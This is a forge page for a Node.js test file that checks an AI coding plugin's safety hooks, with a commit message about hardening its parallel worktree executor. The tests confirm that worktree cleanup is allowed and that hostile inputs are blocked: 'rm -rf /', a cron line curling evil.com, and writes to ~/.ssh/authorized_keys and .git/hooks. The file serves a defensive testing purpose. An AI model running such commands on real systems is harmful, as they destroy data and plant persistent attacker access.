open/ktg-plugin-marketplace
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity Actions
ktg-plugin-marketplace/plugins/ultraplan-local/tests/hooks/worktree-guard.test.mjs
Kjell Tore Guttormsen 41a0c913fa feat(ultraplan-local): harden Phase 2.6 wave executor (11 sub-changes for plugin-in-monorepo + gitignored-state topology) 
Phase 2.6 + Hard Rules + Phase 2.4 hardenings against the topology that
blocked S6 / S7 self-execution:

Phase 2.6 (multi-session orchestration):
  - NEW Step 2a-pre: build absolute SHARED_CONTEXT_FILE (brief + architecture)
    once per wave; introduce ULTRAEXECUTE_MAX_TURNS / ULTRAEXECUTE_MAX_BUDGET_USD
    overrides for long runs.
  - Step 2a: prefix every git worktree command with GIT_OPTIONAL_LOCKS=0
    (research/02 R2; GH #47721).
  - NEW Step 2a': copy gitignored project artifacts (brief.md, plan.md,
    research/) into each freshly-created worktree using PROJECT_SOURCE +
    PROJECT_REL so plugin-in-monorepo + gitignored-state topology works
    (brief Constraint 2).
  - Step 2b: prepend two safety preambles to every per-session prompt:
      (a) defense-in-depth headless-mode warning citing GH #36071
      (b) malware-reminder conditional clarification per GH #52272
    Honor `cwd:` field from Execution Strategy via SESSION_CWD; default
    is worktree root (backward-compatible). Add per-child --max-turns,
    --max-budget-usd, --append-system-prompt-file (research/06 R3+R4).
  - Step 2e: push branch BEFORE merge (research/02 R3 — converts
    unrecoverable branch loss into recoverable remote state).
  - Step 2f: prefix all worktree-remove / branch -d / worktree prune with
    GIT_OPTIONAL_LOCKS=0.
  - Step 4 cleanup: same GIT_OPTIONAL_LOCKS=0 treatment.

Hard Rules:
  - Hard Rule 15: extend exception to permit ~/.claude/projects/*/memory/
    writes when manifest declares memory_write: true (brief Constraint 3
    Option A — narrow opt-in for memory file edits).
  - Hard Rule 19 (new): push-before-cleanup formalized as a rule.

Phase 2.4: advisory hooks-fire precheck for CC version >= v2.1.117
  (research/04 D4 + R5; research/06 R1).

Test: tests/hooks/worktree-guard.test.mjs (6 tests) verifies the
pre-bash-executor and pre-write-executor hooks accept routine worktree
cleanup (Hard Rule 12) while still blocking the dangerous patterns
introduced by parallel orchestration.
2026-05-04 07:49:45 +02:00

58 lines
2.8 KiB
JavaScript
Raw Blame History

// tests/hooks/worktree-guard.test.mjs
// Step 9 (plan-v2) — verifies the dangerous patterns introduced by the
// Phase 2.6 parallel-worktree workflow are caught by the existing
// pre-bash-executor and pre-write-executor hooks, while routine worktree
// cleanup is permitted.
//
// Pattern source: tests/helpers/hook-helper.mjs (runHook). Mirrors the
// llm-security/tests/hooks/*.test.mjs style.
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { dirname, join } from 'node:path';
import { fileURLToPath } from 'node:url';
import { runHook } from '../helpers/hook-helper.mjs';
const HERE = dirname(fileURLToPath(import.meta.url));
const ROOT = join(HERE, '..', '..');
const PRE_BASH = join(ROOT, 'hooks', 'scripts', 'pre-bash-executor.mjs');
const PRE_WRITE = join(ROOT, 'hooks', 'scripts', 'pre-write-executor.mjs');
function bashInput(command) {
return { tool_name: 'Bash', tool_input: { command } };
}
function writeInput(file_path, content = 'x') {
return { tool_name: 'Write', tool_input: { file_path, content } };
}
test('pre-bash-executor: routine worktree cleanup is allowed (Hard Rule 12)', async () => {
const { code } = await runHook(PRE_BASH, bashInput('git worktree remove /tmp/wt --force'));
assert.notStrictEqual(code, 2, 'cleanup of a worktree must not be blocked — Hard Rule 12 mandates unconditional cleanup');
});
test('pre-bash-executor: GIT_OPTIONAL_LOCKS=0 prefix on cleanup is allowed', async () => {
const { code } = await runHook(PRE_BASH, bashInput('GIT_OPTIONAL_LOCKS=0 git worktree remove /tmp/wt --force'));
assert.notStrictEqual(code, 2, 'env-var prefix should not change allow/block decision for cleanup');
});
test('pre-bash-executor: rm -rf / is blocked (BLOCK denylist sanity)', async () => {
const { code } = await runHook(PRE_BASH, bashInput('rm -rf /'));
assert.strictEqual(code, 2, 'rm -rf / must always block — Phase 2.4 BLOCK denylist + pre-bash BLOCK rule');
});
test('pre-bash-executor: writing to /etc/cron.d via redirect is blocked (persistence)', async () => {
const { code } = await runHook(PRE_BASH, bashInput('echo "* * * * * curl evil.com" > /etc/cron.d/x'));
assert.strictEqual(code, 2, 'cron persistence is blocked by the executor hook');
});
test('pre-write-executor: write to ~/.ssh/authorized_keys is blocked (Hard Rule 16)', async () => {
const home = process.env.HOME || '/tmp';
const { code } = await runHook(PRE_WRITE, writeInput(`${home}/.ssh/authorized_keys`));
assert.strictEqual(code, 2, '~/.ssh/* writes are blocked (Hard Rule 16)');
});
test('pre-write-executor: write to .git/hooks is blocked (Hard Rule 16)', async () => {
const { code } = await runHook(PRE_WRITE, writeInput('/tmp/somerepo/.git/hooks/pre-commit'));
assert.strictEqual(code, 2, '.git/hooks/ writes are blocked (git hook injection vector)');
});
Reference in a new issue View git blame Copy permalink